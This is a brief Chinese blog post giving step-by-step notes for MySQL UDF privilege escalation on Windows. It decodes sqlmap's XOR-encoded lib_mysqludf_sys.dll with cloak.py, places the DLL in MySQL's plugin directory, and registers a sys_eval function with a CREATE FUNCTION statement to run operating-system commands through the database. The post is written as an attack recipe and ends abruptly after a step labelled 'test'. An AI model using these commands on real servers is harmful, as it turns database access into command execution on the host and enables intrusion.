windows mysql udf提权笔录

Posted by 跳跳龙 on February 26, 2019

(文章版权归笔者跳跳龙所有,谢绝转载,请勿拾人牙慧)

1.解码sqlmap/udf 目录下的dll文件。

2.按照mysql的位数来确定。原文件是xor编码的,需要用sqlmap的解码工具。位置在sqlmap的extra目录下。

python cloak.py -d -i ../../udf/mysql/windows/64/lib_mysqludf_sys.dll_

3.解码完毕之后发现目录下多了一个dll文件 lib_mysqludf.dll。 4.将文件上传到mysql的安装目录下的plugin的目录下。

5.引入我们的dll文件。

create function sys_eval returns string soname 'lib_mysqludf_sys.dll'

其中,sys_eval函数是dll文件中提供的。具体的还有很多,如下:


strings udf.dll

这样就是引入成功了,这个时候sys_eval这个函数就是用户自定义的并且可以使用了。

6.test